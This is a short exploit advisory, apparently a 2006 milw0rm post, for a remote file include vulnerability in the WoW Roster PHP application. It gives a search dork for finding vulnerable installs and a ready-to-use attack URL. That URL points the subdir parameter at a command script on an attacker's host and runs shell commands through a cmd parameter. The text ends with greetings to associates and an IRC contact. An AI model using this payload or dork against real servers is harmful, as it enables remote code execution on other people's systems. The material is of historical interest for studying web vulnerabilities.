39 lines
No EOL
1 KiB
Text
39 lines
No EOL
1 KiB
Text
--------------------------------------------------------------------------------
|
|
|
|
Title : WoW Roster (/lib/phpbb.php) Remote File Include Vulnerability
|
|
|
|
--------------------------------------------------------------------------------
|
|
|
|
Affected software description :
|
|
|
|
Application : World of Warcraft (WoW) Roster
|
|
URL : http://www.wowroster.net/
|
|
|
|
--------------------------------------------------------------------------------
|
|
|
|
dork : "wow roster version 1.*"
|
|
Exploit :
|
|
|
|
--------------------------------------------------------------------------------
|
|
|
|
Usage:
|
|
|
|
http://[target]/[roster_path]/lib/phpbb.php?subdir=http://[evilhost]/cmd.txt?&cmd=ls
|
|
|
|
--------------------------------------------------------------------------------
|
|
|
|
greets:
|
|
|
|
XLR, rdy, wiggle, phreek, menx [...]
|
|
|
|
special greet: my old gf ;)
|
|
|
|
--------------------------------------------------------------------------------
|
|
|
|
Contact:
|
|
|
|
Nick: |peti on irc.quakenet.org/irc.efnet.net
|
|
|
|
--------------------------------- [ eof ] --------------------------------------
|
|
|
|
# milw0rm.com [2006-08-02] |